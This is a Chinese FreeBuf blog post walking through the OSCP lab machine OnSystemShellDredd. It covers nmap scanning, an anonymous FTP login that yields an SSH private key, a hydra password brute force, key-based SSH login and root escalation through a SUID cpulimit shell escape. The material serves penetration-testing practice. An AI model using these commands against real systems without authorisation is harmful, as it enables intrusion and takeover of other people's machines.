freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

OSCP靶机----OnSystemShellDredd
2023-09-13 21:55:51

从WEB到内网&&FTP匿名&&SSH密钥登录&&SUID提权

今天来打一个OSCP的靶机,难度中等,包含了端口探测,服务探测,FTP匿名登录,ssh密钥登录,suid提权等等…靶场难度中等,需要收集两个flag,一个flag低权限shell就可以获取,第二个要提权后才可以获取。希望大家看完可以有所收获。

启动环境

启动VPN:openvpn universal.ovpn
image.png
攻击机IP为:192.168.45.173
启动靶机:
image.png
靶机IP为: 192.168.156.130

信息收集

1.端口

nmap扫描端口
nmap --min-rate 10000 -p- 192.168.156.130
image.png
目标开放了21,61000两个端口(多扫几遍,有时候一遍会不准确。)
详细探测一下端口信息。
nmap -p 21,61000 -sV 192.168.156.130
image.png
这个靶机竟然没有http服务,很少见。那就围绕这两个端口往下走。

2.端口测试

2.121-ftp
拿到ftp,先试试匿名用户anonymous登录。
ftp 192.168.156.130
image.png
匿名用户密码一般都是空或者Email,这里空密码直接登录成功了。

ftp文件收集:
binary    #以二进制模式传输文件,保证文件完整
ls -al
cd .hannah
ls -al
get id_rsa  #下载文件

经过ls查找,有一个id_rsa文件,直接下载下来,看一下有没有用。
cat id_rsa
image.png
内容加密了,待定。
2.261000-ssh
拿到ssh,老样子,先看下对应的版本有没有脚本可以利用
searchsploit OpenSSH 7.9
image.png
没有,试一下手工登录。
ssh root@192.168.156.130 -p 61000
image.png
失败,用hydra爆破吧。线程为6,字典用msf的。
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.156.130 ssh -s 61000
等待.....
image.png
没有爆出来。

攻击阶段

回到刚才收集到的id_rsa文件,看上去是base64加密的,试一下解密。
image.png
解密后发现了root@OffShell,这应该就是shh登录密码,只是不知道用户,用文件ssh密钥。尝试登录:
ssh -i id_rsa root@192.168.156.130 -p 61000
image.png
密码错误,思路错了。可能不是root用户,倒回去是有一个.hannah文件的,试一下.hannah当用户登录。
ssh -i id_rsa .hannah@192.168.156.130 -p 61000
image.png
.hannah不行,试一下hannah
ssh -i id_rsa hannah@192.168.156.130 -p 61000
image.png
有不一样的东西出来了
这个错误It is required that your private key files are NOT accessible by others.翻译一下就是私钥文件不能被其他人访问,解决办法就是要让别人不可读写这个文件。
修改id_rsa权限:
chmod 600 id_rsa
ssh -i id_rsa hannah@192.168.156.130 -p 61000
image.png
成功登录,有shell了。

内网渗透

获取flag1:
find / -name local.txt 2>/dev/null
cat /home/hannah/local.txt
image.png

提权

1.内核overlayfs提权
lsb_release -a看看发行版本
image.png
Debian,不能overlayfs提权
2.低内核版本提权
uname -a
image.png
4.19.0,不太行。
3.sudo提权
sudo -l
image.png
不存在sudo
4.suid提权
find / -perm -u=s -type f 2>/dev/null
image.png
有一个没见过的cpulimit,去https://gtfobins.github.io搜一下
image.png
果真有
image.png
直接用起来:
cpulimit -l 100 -f -- /bin/sh -p
image.png
成功提到root权限!
获取flag2:
cat /root/proof.txt
image.png
完结。

# 渗透测试 # 网络安全 # web安全 # 内网渗透
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录